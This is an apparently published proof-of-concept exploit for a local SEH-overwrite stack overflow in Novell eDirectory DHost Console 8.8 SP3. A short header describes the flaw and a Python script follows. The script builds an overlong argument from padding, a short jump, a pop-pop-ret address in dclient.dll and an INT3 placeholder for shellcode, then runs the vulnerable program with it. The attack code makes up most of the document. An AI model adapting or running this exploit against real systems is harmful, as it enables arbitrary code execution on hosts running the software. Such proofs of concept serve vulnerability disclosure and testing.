# Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite# Date: 17/10/2010 # Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)# Software Link: http://www.novell.com/# Version: 8.8 SP3 (20216.67)]# Tested on: win32 xp sp3 (spa)#Summary:# DHostCon.exe is prone to local denial of service caused by stack overflow# triggered if user-supplied parameters are too long (1074 bytes).# Due nature of this vulnerabilty, attackers could exploit this issue# to execute arbitrary code on local host.#PoC:#!/usr/bin/python
import os,struct
def main():
path="C:\Novell\NDS\dhostcon.exe"
args="x.x.x.x"#ip server
buf="A"*1065
nseh=struct.pack("<L",0x90909eeb)#jmp short 0012ff50 +NOP + NOP
seh=struct.pack("<L",0x61012c20)#PPR dclient.dll
shellcode=struct.pack("<B",0xCC)#INT3
crash=buf+shellcode+nseh+seh
os.system(path+" "+args+" "+crash)#Crash!if __name__=="__main__":
main()